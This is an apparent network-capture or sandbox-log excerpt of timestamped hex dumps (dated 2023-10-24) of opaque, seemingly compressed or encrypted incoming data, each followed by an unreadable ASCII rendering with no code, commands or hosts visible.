                                                                                                    2023-10-24 04:55:22 UTC1090INData Raw: d7 af 45 db 25 db a7 bb c9 05 69 d6 ef 0e 75 4b 76 d1 bb 06 f3 30 ca fa e2 7b ac 3b 6f 16 3b 4b a4 39 5c f3 57 af 84 db a8 6d 23 dd 60 16 ba ab be b1 50 bc f9 4d c9 b4 76 11 df 43 79 14 d1 8b 45 81 db 24 db 46 ba e2 bf dc 6f 30 d6 40 8c ba 5b ed 11 52 87 f0 df 22 de 32 a5 b7 54 b6 92 77 13 9e b6 6a ad 8d d3 c9 c6 dd 46 be 10 ae ad fd 5d 4c 67 89 e3 00 0b e9 30 f7 8c 19 16 59 25 cb b0 de 03 8f 96 f0 c6 67 e9 9d 09 ea 2f 90 a0 fe 02 cd 57 71 b6 7a ad 6d 37 5d e1 5e d5 b8 09 d7 30 32 89 df b9 a1 56 21 af ac ac 3e b5 17 19 c1 2b 3e 21 6c 0b 1f 19 3b 1c e7 1d 72 15 58 87 ff 9b c2 0c 73 fa 16 f9 b6 b7 38 99 4b 9c c1 07 51 26 0f 7f 0f 6f 9f 14 94 ad 89 95 ae d8 fa 3d 53 71 17 7d 89 56 23 ff e7 97 02 bb ad 1d aa bd a8 0f a5 b2 3e 69 ba 5f dd 4b 5c 7f 05 2b a8 54
                                                                                                    Data Ascii: E%iuKv0{;o;K9\Wm#`PMvCyE$Fo0@[R"2TwjF]Lg0Y%g/Wqzm7]^02V!>+>!l;rXs8KQ&o=Sq}V#>i_K\+T
                                                                                                    2023-10-24 04:55:22 UTC1098INData Raw: 3f 92 5c 53 09 8c 7b 49 b3 ce fc 9f 5b 34 d6 4b 89 04 98 a4 58 8e c5 5c e8 e4 f7 46 7f c1 e8 cc e1 be c6 6b b1 c7 88 31 91 f3 01 83 1d ba 3d 67 a5 ce 63 a9 ee 58 d7 79 96 ea 2e 70 64 cc 45 ab fb 9f 82 92 2b 37 85 ec 2d dd 03 bc f8 8c ea e7 e8 ce ed c7 78 43 f5 7a 43 7d 45 ca 0a 7f 5d 83 e7 f7 3f e0 88 dc e1 42 0f a1 aa 07 ad e4 a0 13 24 6d 05 b5 7b 13 83 75 b9 50 b9 77 f7 11 c5 81 0e cb ea 60 79 4b 28 af 5c dc 9b 18 48 d1 5c 74 74 1d 0f 3a af f9 28 25 aa 69 94 b6 1b 00 dd b3 aa 0a 57 a8 ed 03 9e cc 4a 0e 65 f2 3c 88 33 17 5b 91 fe 0d c8 c7 16 6d 7e 09 f5 5f 48 99 ec 72 90 9d d5 b5 af 04 da 64 7f 5c 2d bc eb 24 6d dd dc 3c 08 f9 8a 59 47 6d 38 47 ff 3c 8d 3b 32 22 70 3d d2 e3 42 4f 91 b2 07 fa 07 6f 31 3d 70 65 1c bc 69 3a 7a 53 1a 4f 50 de ef a2 78 a0 1a
                                                                                                    Data Ascii: ?\S{I[4KX\Fk1=gcXy.pdE+7-xCzC}E]?B$m{uPw`yK(\H\tt:(%iWJe<3[m~_Hrd\-$m<YGm8G<;2"p=BOo1=pei:zSOPx
                                                                                                    2023-10-24 04:55:22 UTC1106INData Raw: 7c ac 4f 83 a3 26 cf 7b 48 57 8c c6 fd f6 c6 57 68 0c b4 b5 0a 77 65 0f f2 d0 36 6c e9 0d e4 d2 3d e9 fa 67 46 36 7e 17 d9 05 3c ce 41 d2 34 cc ec 1a d0 7a 0c f4 7e 27 70 68 09 aa 1a d1 9a a1 66 f3 f8 19 bb 7f fe 17 d9 39 21 eb 5f f2 5b 1b b3 45 b5 ab ff 6b 25 47 6a 14 f8 b9 6a 78 ae a7 5c 24 ae 0d 47 f3 14 ef 53 90 6d 19 cc a5 12 86 48 d2 c8 e5 55 da 68 95 50 cf 00 ac 1a 52 52 d4 34 ad de 5d e0 3c be 23 5b ff af b1 05 78 32 6d ee bf e3 48 a5 9a 9d 33 4d 44 96 5c 44 95 3d e5 c9 30 d7 db 59 e8 c6 ba fc 03 66 a6 d2 7c 05 35 13 c7 7e c2 cc db 70 94 0a 6f 36 c0 1c 6f ca a1 ea 16 fd 17 37 cc 4c ad 92 01 fa d2 f9 de 2b 42 c7 51 50 dc ba 91 7b c4 f4 3e a5 f0 6c a6 cd 17 48 76 ae 6f e2 f1 ab 58 3a d5 f7 b0 de 6a 7c 32 65 42 aa 79 c2 51 0f c2 65 42 67 8e e1 89 a2
                                                                                                    Data Ascii: |O&{HWWhwe6l=gF6~<A4z~'phf9!_[Ek%Gjjx\$GSmHUhPRR4]<#[x2mH3MD\D=0Yf|5~po6o7L+BQP{>lHvoX:j|2eByQeBg
                                                                                                    2023-10-24 04:55:22 UTC1113INData Raw: 75 a0 36 8b 0c 45 ce 44 8e 13 7a 17 db 82 dd e0 ab 6d 93 23 5f 6d d8 90 74 8c 20 8a 80 59 04 59 28 fe a9 e6 9f de 06 94 7f 26 b2 5f a8 0c e6 c9 29 d0 9b 3b bf 15 59 87 03 fa 75 e4 6b 5e 0f dc 13 a7 7d ac 7c 7e 58 a8 1c 3f e3 45 95 90 46 2e 50 1b 8f a1 57 56 df 2c 87 f5 11 a8 ef 35 72 e5 dd 2b 9f 85 7c d0 a5 ec 29 7d 4b d5 c1 4c af b4 e0 7e f6 24 ee 1f 22 88 dc 2d 51 49 7c b4 12 81 4e 01 73 63 53 b1 15 23 d4 0d 6c 90 fb fa 2c 0f f8 1f 8b 7d 06 ff c7 92 7b ba 22 67 5c e3 5a 61 7f c0 38 8c e9 8d 46 c8 f5 3b 1b 64 8d 9c 8b 13 6f 12 86 5d f0 31 a5 4f 31 01 52 3a cb d8 17 79 e3 96 c7 61 b1 fc 1e d8 9d ea fb 36 61 ef 42 9c 86 ae a5 c3 9c 2f 8d 4a 11 c6 60 37 2f 7f db 99 d0 71 a2 5a 9c 8f 90 ca a3 1e bb e5 51 61 65 44 73 a7 70 97 6c 6d d0 61 41 53 07 59 22 5d 23
                                                                                                    Data Ascii: u6EDzm#_mt YY(&_);Yuk^}|~X?EF.PWV,5r+|)}KL~$"-QI|NscS#l,}{"g\Za8F;do]1O1R:ya6aB/J`7/qZQaeDsplmaASY"]#
                                                                                                    2023-10-24 04:55:22 UTC1121INData Raw: 7d 4e b2 87 f5 b1 5a ba 91 13 96 79 37 d4 af 94 ec 96 76 25 c4 ba 9e 95 41 cd ff a2 6a 76 a2 6a c6 95 1e ec ed 19 6e f7 37 ea ab 6c 34 f9 7a 92 6a b7 7c b8 dd 24 31 b6 ab 12 58 db ed a4 da 7d ee 44 da bd 42 b5 1b 3f dc ae 4a 80 ed ae 95 92 76 6f 59 db a5 6a 46 c4 d4 c1 e4 37 ed be a0 be f6 da 91 af af a9 76 05 c3 ed 86 7b 63 bb a1 1e d6 76 1d a8 76 bf a7 da 1d 49 b5 7b b3 6b a8 dd 50 0f 6c 77 96 2f 69 17 31 25 c8 7d 0a a9 99 a0 7f df e9 1e 6e d7 9b fa 8a 31 26 f0 d5 5f 4a f1 bf de a1 76 e7 bb 63 bb 73 14 d6 76 d1 bb 0d da dd ec 42 da 9d 2a 24 ed e6 0e b7 3b 47 81 ed 2e f4 3c 2b ab e9 2b 96 e9 bb c9 4e a9 6a 9b 07 ff 51 be 1a 75 1d ce 28 f7 95 e3 77 af 01 1d d3 e7 89 80 fd 71 a7 38 d4 55 b4 15 24 27 9f 87 71 a4 79 e1 ae a9 7f f1 27 b8 c4 76 c2 17 9c 8e d8
                                                                                                    Data Ascii: }NZy7v%Ajvjn7l4zj|$1X}DB?JvoYjF7v{cvvI{kPlw/i1%}n1&_JvcsvB*$;G.<++NjQu(wq8U$'qy'v
                                                                                                    2023-10-24 04:55:22 UTC1129INData Raw: 77 fd 64 11 53 25 f2 9a cb cf 1d 28 bf 12 7b f8 87 23 3f 7e 48 b5 eb 7d 36 b7 53 79 20 e9 aa 56 79 cf b0 5c f4 b5 14 a4 86 41 52 08 d6 d3 81 e8 2b b1 24 d6 cd 89 15 ff ae 1d 8f de f4 92 d2 4f db f5 f1 0f 6c ef 45 3a 72 22 4a fa 95 8d 3c 79 40 ed 21 0e e6 46 75 24 18 ce 09 1e 48 a7 39 12 cc 2d 36 5e 98 9b 38 94 59 78 fb 03 e0 c0 c8 b9 98 21 34 c9 15 4b d5 fc d7 02 d6 e8 8f 3f ce d3 bc 2e 1c c6 51 ba 85 ba fc 87 81 ea 4a 59 dd aa df 11 f5 79 57 40 ed ca e3 87 cb c1 96 f4 fd 16 4f df 6c 5a ed d0 d2 2c 91 2f 72 62 a6 b9 71 b8 a0 41 79 66 6e f8 e1 34 da 65 35 68 97 e5 0c 84 de 7c c5 37 d8 69 5c 02 6a 67 8a f9 82 ef f1 a4 6d ef e9 ef 49 c6 b3 59 47 8e 1d 2a e1 77 91 dc e9 9c aa 0a f1 54 cc c0 3e 76 33 77 cb 4c 92 db ce cc 5f 67 d9 75 0f ec 64 b1 dc bd ce 16 6f
                                                                                                    Data Ascii: wdS%({#?~H}6Sy Vy\AR+$OlE:r"J<y@!Fu$H9-6^8Yx!4K?.QJYyW@OlZ,/rbqAyfn4e5h|7i\jgmIYG*wT>v3wL_gudo
                                                                                                    2023-10-24 04:55:22 UTC1137INData Raw: 06 68 d2 8c 43 b7 44 14 d7 63 19 73 3c cc a9 eb 6e 39 57 48 1a ef 4b 14 2d 18 99 18 ef 66 52 be a3 5e 25 a3 1d fc 43 20 6a de 20 d1 a4 db 92 c8 ce f5 7f 38 96 89 ea ef 8a 64 5d a6 18 67 7d b6 d3 a2 eb 24 03 ac 65 65 0a 66 ee 65 0d 2c 58 08 bb e2 fd 91 cd c9 12 cd 6a 5b 7d 91 9b a9 97 95 79 8d c3 5b f1 a8 66 dc db ef 56 c3 bb d9 8f 58 d2 a5 fd ea d6 b7 e2 f8 46 0e b7 6b bd 13 29 f2 23 51 83 23 31 f6 86 78 3b 48 fc bf ba 44 17 2c 68 05 db 74 b3 39 46 5a 7b 65 14 e3 60 05 41 42 cd 34 e6 da 11 de 6e 43 5b 34 5a 28 82 d6 d6 59 64 c0 50 0b 9b 37 d8 db f7 e9 d6 b9 1a 53 9c a2 2f 7f 3e 6b d6 55 43 9a bb ba 8b 69 b2 a4 ef 03 1d 98 48 83 59 2a 07 44 40 57 77 3a f4 41 0f 9a 3a 1c 80 0f 2d c0 af 8c 8f f0 ee 8e 60 62 39 90 f8 05 16 46 1d 59 f9 7d 90 75 44 31 43 7c cd
                                                                                                    Data Ascii: hCDcs<n9WHK-fR^%C j 8d]g}$eefe,Xj[}y[fVXFk)#Q#1x;HD,ht9FZ{e`AB4nC[4Z(YdP7S/>kUCiHY*D@Ww:A:-`b9FY}uD1C|
                                                                                                    2023-10-24 04:55:22 UTC1145INData Raw: 7e f4 bf b5 3b 9d c0 ee f4 c8 4f 0b ce e2 e9 14 da f6 c1 1c b4 35 f8 29 de 45 99 61 b9 fc 6e a9 7e 1c f1 c5 ad 02 b2 02 b2 f2 92 92 f2 10 3e 2e 7e b0 ea 87 89 fe 60 dc 1e 5e 37 7a ee e3 e7 f0 dd fb 7f 15 3f 70 04 7f d0 af b0 2a ad a8 20 c9 3b a8 fc 55 f7 8c cc 8a 9c c2 a2 84 ef c0 be 5f 08 f6 bd 77 5e 79 72 7e 6e 66 60 44 c9 cb 6b 53 d3 4a 33 2b 2a 5f ff 26 56 b2 6e 3b 7a e0 b6 5e c9 5e b9 85 a9 a9 85 63 f1 83 29 fb 26 f2 c7 b2 1f f9 75 cc fc 4e e0 8f 3d bc 3f 98 f4 d9 ff d6 1f 7c 0c fc 41 ff 0c a0 d8 d4 f0 a2 f0 2c c0 33 f0 6f 78 4e 61 56 42 59 4e 8a 4f 7e 46 11 c8 bf 9f 81 cf 1f 05 5f dc 2f 1d 78 3f 25 ac 30 2c b3 b2 22 07 fc 93 b0 ec 82 cc f8 d2 d2 64 ef bc f4 42 93 1f 93 98 90 0f 63 ff 8a c6 53 be 8f 27 ed 1d a3 83 c6 e3 05 df 4c a1 0d d2 07 9a 9d 14
                                                                                                    Data Ascii: ~;O5)Ean~>.~`^7z?p* ;U_w^yr~nf`DkSJ3+*_&Vn;z^^c)&uN=?|A,3oxNaVBYNO~F_/x?%0,"dBcS'L
                                                                                                    2023-10-24 04:55:22 UTC1152INData Raw: c8 ae 46 ff 7b 90 3a e3 25 97 74 af 75 c0 1a 55 2d 17 8a 6d f5 b6 43 5b d6 bb 24 c6 6e 1a 7b ec 81 0e 4e 8c d4 b7 6f f2 37 53 95 db 82 d5 12 cb 80 fe d0 ff 6c 31 cd 80 ad dc de d8 be f5 a1 6c 85 eb c6 52 ba 5b e6 6a 22 9f fb 8b 45 93 4d 7d 27 ed bb ae 7a 92 e2 24 c8 d3 84 2e 6b 06 74 4a 4b 3b 57 87 43 b0 9b 40 9b 3a 2a ae a3 dc f5 b1 36 8e 9d 27 96 28 bd e6 68 7d 45 aa 63 1b 17 d9 1d 74 ae 17 37 6c a4 53 bb 59 b1 d4 c4 72 ee 2f 17 52 15 f3 1a 7a 19 ef 80 9a 7e a5 c7 ac 51 eb e1 54 e7 db da ee de f7 46 38 a5 6d fb 6d 51 d7 5a 1b ea b4 87 33 be 61 6b b8 52 ee 68 74 0d da 52 74 dc eb 74 65 bb e5 a9 56 75 07 e7 e3 04 8d 87 40 8e f9 5e 6f 38 8b 25 aa 4b 9a 2e 65 57 83 73 ea d6 37 08 b2 4a 7e c6 fa 4d 7d da ee a0 8d ca 51 d1 27 f1 f0 2e d3 d7 74 a1 54 e6 f6 48
                                                                                                    Data Ascii: F{:%tuU-mC[$n{No7Sl1lR[j"EM}'z$.ktJK;WC@:*6'(h}Ect7lSYr/Rz~QTF8mmQZ3akRhtRtteVu@^o8%K.eWs7J~M}Q'.tTH
                                                                                                    2023-10-24 04:55:22 UTC1160INData Raw: 45 d4 f9 db b1 67 3d b5 ef 5e 6f 0c 6d c4 77 bb d6 c6 36 5d 0b fb 1d 2c c7 b1 36 b6 f9 5a d8 5f 03 7e f5 f5 ce 94 81 f2 bd 1e f1 62 60 fd fc ef 7f 96 02 42 bf 8e 82 35 f5 5e 7b 27 81 7e 47 e2 49 ff a5 f0 7f ed 7f c1 1c 14 b7 8f 1c cf 14 6b 0d 6c bb 2c ad 6a c7 fa d3 ff 8b 6b e9 c7 72 2d 3f 84 7b 1a d7 f0 0a e2 5a 90 c1 f5 dd a0 bb df 92 6a 9e 70 ad 65 32 de 93 35 2e 3b af f7 69 f3 ff f8 2b f9 55 8b 42 be 48 bc 24 f3 92 4c 9b a3 48 4f c2 27 ce 5b 36 49 a5 b2 96 1c e7 f2 a6 de 2f df 1f 79 88 3c cb d4 5a 20 96 2c 9f 47 6a 34 89 6d fc 7b dc ad ea f8 93 da 7d d3 d4 ae 8a 68 47 54 8c 6a 2f 9d 62 a4 57 a6 21 c6 aa 26 c5 5a 15 65 63 3d 61 de 2b ac 7d bb 20 19 04 be f6 50 25 d9 31 56 85 bc c0 3a fd 28 0b cc cd 8d ef bf 58 9b 9b e3 17 aa 85 c5 af 77 27 d9 83 7a 88
                                                                                                    Data Ascii: Eg=^omw6],6Z_~b`B5^{'~GIkl,jkr-?{Zjpe25.;i+UBH$LHO'[6I/y<Z ,Gj4m{}hGTj/bW!&Zec=a+} P%1V:(Xw'z
                                                                                                    2023-10-24 04:55:22 UTC1168INData Raw: 08 14 e2 14 f3 eb 9f 2e 70 b2 d0 38 8a c4 d6 59 b3 19 7d ef dc cf 68 c5 79 59 2a 2a c6 ec 44 5a 71 ee 70 e4 20 22 19 ea 39 b7 26 d2 33 b9 2e 56 3a 87 ef 73 40 5d 24 61 54 a8 4d 9d bc 80 4c 69 89 5f 48 15 72 78 06 9d 3b 38 35 1d ef f3 80 58 b8 cf db 94 d7 c9 33 05 dc 19 35 c2 ce 80 e4 4a d9 12 fe 32 88 fc 0b c0 62 4d db a9 7c a6 b1 9d 1e 85 35 b5 53 06 b5 d3 d0 29 ac 76 aa fe c2 0c 3b 6d ef 01 76 9a 3e 97 da e9 f1 4c 62 a7 a5 6d 6c 76 ba a7 c1 0c 3b 6d 70 02 3b 75 8d 67 d8 69 e4 4c 6a a7 a3 d3 d1 4e dd 63 75 76 7a 00 ec b4 26 d2 1b 30 75 9d 83 13 b8 44 7e 47 88 77 ee 9c 7b 39 0d f7 07 6d d4 76 29 a4 af dc da 2e 89 ce e5 d4 64 60 16 a7 29 ee b5 c8 56 5d 7f 99 e4 d6 3d 19 7c ef 0a 48 2e 15 ac 26 fd 15 6f b9 f7 67 19 63 da 0d d6 d4 c7 d3 29 a6 7b 3f 63 c5 b4
                                                                                                    Data Ascii: .p8Y}hyY**DZqp "9&3.V:s@]$aTMLi_Hrx;85X35J2bM|5S)v;mv>Lbmlv;mp;ugiLjNcuvz&0uD~Gw{9mv).d`)V]=|H.&ogc){?c
                                                                                                    2023-10-24 04:55:22 UTC1176INData Raw: e7 31 87 00 e7 93 5d 18 38 1f fe 92 e2 7c ab 37 e2 fc 63 0f 1d ce 4e 04 67 1d a6 0e 86 98 72 f7 51 4c f7 f2 28 a6 ca 3e 14 53 a5 03 62 9a 63 cf c0 d4 83 35 ee d6 61 1a 0d 0c bc 9e e4 37 0a 20 32 d4 4d 3c 61 c7 79 c5 57 c6 38 97 c3 1a 77 9a 94 e2 ec bc 9f 15 e7 80 19 66 e0 ec 7b 08 70 56 76 a1 38 73 3c 08 ce 27 15 6c 38 df 9f 66 06 ce 37 0e 02 ce 91 b6 0c 9c dd bf a2 38 2f 75 40 9c a3 ed 75 38 8b 39 e6 ea 0d 29 d7 80 9f 73 f7 51 7e f6 ea dd 46 f8 d9 ab 57 2b e1 67 67 81 06 f8 59 6d 67 42 6f f4 d7 f3 73 9a 76 52 52 34 e9 9f 59 63 32 b7 d4 78 d0 38 b7 d4 06 6b 9a 2b 24 de ca 58 51 fa 15 6b 6e e9 e8 14 33 72 4b fb f7 3b 09 2c 87 00 1a 98 5b ca 75 21 b9 a5 e0 5d 6c b9 a5 b4 c9 66 e4 96 62 bf e6 3b 71 6e 77 53 77 e6 96 e4 07 69 6e c9 96 87 cc da 6c fb 4a 9b 5b
                                                                                                    Data Ascii: 1]8|7cNgrQL(>Sbc5a7 2M<ayW8wf{pVv8s<'l8f78/u@u89)sQ~FW+ggYmgBosvRR4Yc2x8k+$XQkn3rK;,[u!]lfb;qnwSwinlJ[
                                                                                                    2023-10-24 04:55:22 UTC1184INData Raw: 1b 80 81 5e 45 91 94 ce 2b 80 e5 79 d6 37 b6 44 5d 94 5f 21 e3 89 2f 0e 65 c0 7c 9d d3 42 f4 ea 9c 1c 03 2b e5 2e cd 5a 4f 4c a7 d8 e4 8d f1 f0 f6 fc f4 0d b4 9b d4 31 2d b1 b0 14 c6 95 22 ad 38 c2 31 71 04 ad de e0 9a c7 a6 93 7c 7c 9e 2e 3f c5 24 8e 3b 9f 75 fd 83 71 49 f3 b8 c1 03 e3 f2 fb 66 ae 27 1e a2 1c 02 62 0b b4 95 4a 3d 4d 49 df f2 0a e4 e6 48 a4 1b e2 0a 36 e7 f3 9c 43 a7 bb 2f e5 c1 f0 41 91 89 b0 d2 17 81 92 ee 9c b3 4f 64 b1 de 04 7d bf fa 4f 2a 21 a3 9c 03 06 d7 1c 9e 71 95 92 ef c7 67 d2 1e 61 9a ca 94 42 45 41 8e 29 c6 50 51 6c d2 d2 82 56 f9 e3 55 10 e6 c1 b1 ce f2 50 95 29 a7 88 95 b2 88 9f 33 e5 18 10 6b ac 8c cf d4 aa 19 7a a1 b8 0a bc 5f b4 be 3c 35 57 8f fc 57 cd 04 00 ff b9 04 a9 8d f1 ba dc 92 82 aa 8d c5 06 4d 69 29 2f 68 33 2f
                                                                                                    Data Ascii: ^E+y7D]_!/e|B+.ZOL1-"81q||.?$;uqIf'bJ=MIH6C/AOd}O*!qgaBEA)PQlVUP)3kz_<5WWMi)/h3/
                                                                                                    2023-10-24 04:55:22 UTC1192INData Raw: b7 c8 98 03 87 22 cd 12 2a 27 6d 3a 9b 04 fc 3a ad e3 5a 87 e1 d7 e2 99 29 44 c4 64 d5 18 11 6b 2f c3 88 58 72 52 7a 47 e3 19 8c 96 4e ac 1b d3 70 3d 25 e5 e0 8d 50 03 51 4f 51 5f 0b 51 f3 a0 40 21 12 8c 77 d8 e2 1b 6c 9b 42 5c 84 da 09 31 71 07 4a 82 c5 d1 50 f2 5a bb 80 4f b7 75 a2 c4 a7 c4 2d fd b1 ee 2d 84 5a 5e d3 03 db 35 44 53 62 d6 06 3f 4b 69 ce da 38 27 9f b6 13 74 53 43 e0 64 b3 de 30 ff 5d 0a ff aa 36 2d 3a ee c0 4d b9 79 1e 3f d6 de f4 de fd 11 7c c4 fd 98 d0 4e bd dd 42 5a e6 56 50 6b e7 a9 8f b0 dc 03 43 ec 6e d0 0d d7 3e ec 8a 0b a0 7d 0c d7 51 fb 94 09 da c7 ad ff 9b ed 7f a8 7d b8 31 11 0d 3b 51 db c6 ef 6e 30 c1 f7 9a 63 9d 8f f0 6d 1d 7d 8f fd 0c 6b fe aa 89 c3 48 b0 87 55 53 75 1f 57 bf a3 9c 44 39 0f 72 88 d8 1b 65 96 f3 da 38 e7 dc
                                                                                                    Data Ascii: "*'m::Z)Ddk/XrRzGNp=%PQOQ_Q@!wlB\1qJPZOu--Z^5DSb?Ki8'tSCd0]6-:My?|NBZVPkCn>}Q}1;Qn0cm}kHUSuWD9re8
                                                                                                    2023-10-24 04:55:22 UTC1199INData Raw: 3c 40 d3 ac a3 14 a0 69 bc 32 a2 63 c0 3a 54 95 55 0c 3b c3 c3 1b 6e 21 31 f7 9e e1 91 83 67 78 44 0c 15 91 a1 64 e7 65 44 c7 ea 14 25 a6 12 f0 7b c4 7b 95 21 65 e5 a6 92 70 bd b9 62 39 56 01 08 8d 1d 6e 71 ef 13 aa 0f 70 01 d0 ce 41 e2 23 6a 74 91 6a 41 0c 99 a1 e6 dd 85 bf 1f 84 1a ca 45 d9 17 ce d2 c4 aa fc f7 ad 3e 33 70 6b 3a 26 c7 58 5e 22 54 69 8e a7 16 a5 2b d9 59 c2 7d 44 b9 ce 34 ec 3c 51 ac bd e3 ca f0 f7 68 e5 7b 6b 33 3f 2c de 0a 75 0c 8c 28 34 16 96 0a b7 f6 d7 70 2f 27 65 90 de 71 aa c2 f2 02 bc d1 2c ee 47 c2 09 e9 90 5f 31 72 96 5c a0 e4 9f 29 59 b4 67 42 4e 71 a5 52 d4 cf e6 5b d3 48 5d b4 9a 47 70 93 d9 6a 96 fa 05 ff 3f de de 3b 3e aa eb 5a 14 06 84 84 31 cd 80 a6 9f 19 15 54 11 c2 60 1b f7 16 82 41 bd 00 12 a0 32 ea bd 53 54 a6 17 b5
                                                                                                    Data Ascii: <@i2c:TU;n!1gxDdeD%{{!epb9VnqpA#jtjAE>3pk:&X^"Ti+Y}D4<Qh{k3?,u(4p/'eq,G_1r\)YgBNqR[H]Gpj?;>Z1T`A2ST
                                                                                                    2023-10-24 04:55:22 UTC1207INData Raw: e8 c4 4e d0 d4 ac 46 e7 e3 40 0d f3 cd 84 83 94 69 71 90 03 ab 4d 8d 83 14 f8 d7 46 f8 8f d5 bb 42 dd 69 20 5e a9 05 bc a0 34 d8 af 1d 70 d5 46 f1 69 b8 8f ff 97 00 da 8c f6 27 bd be de 46 d0 a7 85 40 69 0b 68 47 0b 68 ea 6a 9f f9 50 af d9 40 16 1c c4 97 4a 02 bc d8 00 2f 26 a6 7b 06 1c a4 4d 83 e7 6c 55 11 d0 d7 05 f0 39 c0 eb f3 3f 5f 3e 60 ad 06 e4 23 95 68 e5 54 4a 56 11 a7 ed 30 5f 3b 48 8a 05 a0 47 ed c3 8f 0d d0 4f 34 ab 34 3e 78 e1 fb ed eb c1 b7 50 fb f1 41 3c 3e 70 02 e0 c5 04 f8 b3 70 9c e8 19 17 4f fc ab 7c 88 cb f6 90 68 02 b5 59 32 89 3f b0 d7 2e ee 2d 05 62 bf f5 33 f0 69 2a 58 35 da 47 a2 f9 b4 04 7c ef 04 bf 3e 92 07 be 14 f0 36 91 6e 56 d0 d4 66 c1 38 2f 76 d7 f3 f8 65 03 89 8a a6 f6 23 92 29 9b 77 b7 c0 06 64 c8 2b 88 76 34 01 36 8a 89
                                                                                                    Data Ascii: NF@iqMFBi ^4pFi'F@ihGhjP@J/&{MlU9?_>`#hTJV0_;HGO44>xPA<>ppO|hY2?.-b3i*X5G|>6nVf8/ve#)wd+v46
                                                                                                    2023-10-24 04:55:22 UTC1215INData Raw: ba cc a4 5c b2 9e be f0 6e 9f d7 5f f3 fc 4b bf 5b 05 9a 01 cf ac d9 38 c5 97 77 b1 8a 9a bd 5b 90 41 f9 f2 72 ee dd 34 c1 b7 c5 3c 67 e0 c2 f9 e2 48 3d 0d dd d3 0e ef 02 f8 cb 9f 22 ef e6 31 76 a0 25 7e 89 86 f5 cd 84 f7 39 f1 5c 7c 3b e8 97 76 de bf fc 73 88 6c 71 3b a9 b6 31 10 0f 2a 8d f2 0f 22 27 df 4d e2 fd 4b c7 60 6c ef 68 ec f8 e4 24 67 f4 36 72 f2 48 9f 39 e0 fd 32 ec 42 51 22 c0 0b f2 41 81 aa 02 62 0d 1a 2f 4d 7e be 5b ef f9 6e 6e 03 e9 31 53 48 ba cb f2 f5 a9 53 c0 bb c8 57 49 82 ba d2 a9 c7 25 dc e2 b8 c4 5b 1c 97 74 8b e3 92 6f 71 5c ca 2d 8e 4b bd c5 71 69 b7 38 8e ae 6f c2 da 8f 2a e2 41 25 90 1b 9b c2 6f e1 14 81 37 57 4d e2 c6 74 ea 9e 17 ea 83 76 b0 83 16 58 37 85 93 ad ea fa c6 86 f1 e0 8c 05 09 0b 5f bb ef 66 8f 62 e2 8b 53 d2 1b 05
                                                                                                    Data Ascii: \n_K[8w[Ar4<gH="1v%~9\|;vslq;1*"'MK`lh$g6rH92BQ"Ab/M~[nn1SHSWI%[toq\-Kqi8o*A%o7WMtvX7_fbS
                                                                                                    2023-10-24 04:55:22 UTC1223INData Raw: 66 b2 a3 54 71 eb e1 83 d7 a6 7d f6 78 e0 bb b1 61 a7 83 aa ce 77 10 69 54 1e fa d7 b4 38 89 d6 7b fa a0 d6 96 b7 62 c5 75 5e ef 0c 6d b9 47 c6 d3 78 be 3d fc 84 fd ac 68 a1 da 63 da a8 66 f1 cc 14 41 ad fb 5b 63 8f 8f 9e 99 ac ac 71 9b 3a e1 d8 db 33 92 14 0d eb de 7c 55 17 f2 f6 80 16 38 07 8d 48 ed b5 4b 12 b9 d7 ce 33 af 46 9d 63 d9 05 c8 68 06 e2 4e 33 ee 33 3f e1 46 93 67 9b c8 7b 5e bc 67 9b 85 1e 62 4f 93 f7 bc 39 f7 72 c3 33 38 05 d9 cf e4 bb 6b f1 d4 62 f6 33 6f f2 8c ff 5d 77 dc 11 c9 c7 6f 2d 9e 1a cb 7e b6 5a 18 60 f2 0c de 8b 34 f9 86 e9 7c e1 d9 06 93 f1 36 8b 7d 4c 70 f6 10 6f e2 3d 83 1d 41 fc 79 f8 13 fa 85 f1 9e c1 19 e2 1e ac 67 03 8c b8 f8 70 fa 6d c1 d3 f7 97 86 cb 37 29 43 39 fd cf 70 5e 2e 9c 57 15 c0 3b eb 99 aa 15 05 4b a3 4d 9e
                                                                                                    Data Ascii: fTq}xawiT8{bu^mGx=hcfA[cq:3|U8HK3FchN33?Fg{^gbO9r38kb3o]wo-~Z`4|6}Lpo=Aygpm7)C9p^.W;KM
                                                                                                    2023-10-24 04:55:22 UTC1231INData Raw: 57 ce 29 bd 41 71 ec ff 42 6f 8c a3 c7 cb c7 ec 5b 57 e3 a5 20 df b3 fd b5 89 c6 fa 07 50 b7 2b 6e 32 d5 39 6f d1 b2 a5 b2 28 5b 90 c5 89 63 d9 ad 38 cc 3a 83 ad 60 d7 20 5f a3 71 c9 23 91 83 65 fd 97 82 96 29 8f ae 60 a5 99 e4 c7 d3 30 43 60 59 b6 72 30 87 02 9e 0c c8 11 dc 8a cd 8e 53 5e a1 71 81 9a fa 8b 71 c9 c5 5d 88 db d0 fa a9 38 39 23 43 7d 0b ee 44 b7 ac 8b e1 f6 f1 74 33 b5 b1 64 cc 3b 5a 86 8d 47 bf c4 d4 06 24 13 2d 9a d9 25 6c 3c 5a b5 0c 33 b6 31 1d 67 6e 99 7e 50 5b 2c 41 ed 58 84 3e 0d c3 93 af 23 4f 82 3f 1e db 05 4f 26 62 ec 02 95 c7 6c cc c6 a7 60 34 46 65 7f 99 f1 26 d0 e3 e5 90 55 ed 6a bc 0c cc 64 41 e5 22 8f b3 27 f8 4d 9a 2e 59 98 33 5f 69 b4 24 06 0a 25 60 e4 95 8f ff 82 ec 43 45 22 57 38 83 ce 0e 32 b8 bc 6a c4 25 8f 7c a3 02 7d
                                                                                                    Data Ascii: W)AqBo[W P+n29o([c8:` _q#e)`0C`Yr0S^qq]89#C}Dt3d;ZG$-%l<Z31gn~P[,AX>#O?O&bl`4Fe&UjdA"'M.Y3_i$%`CE"W82j%|}
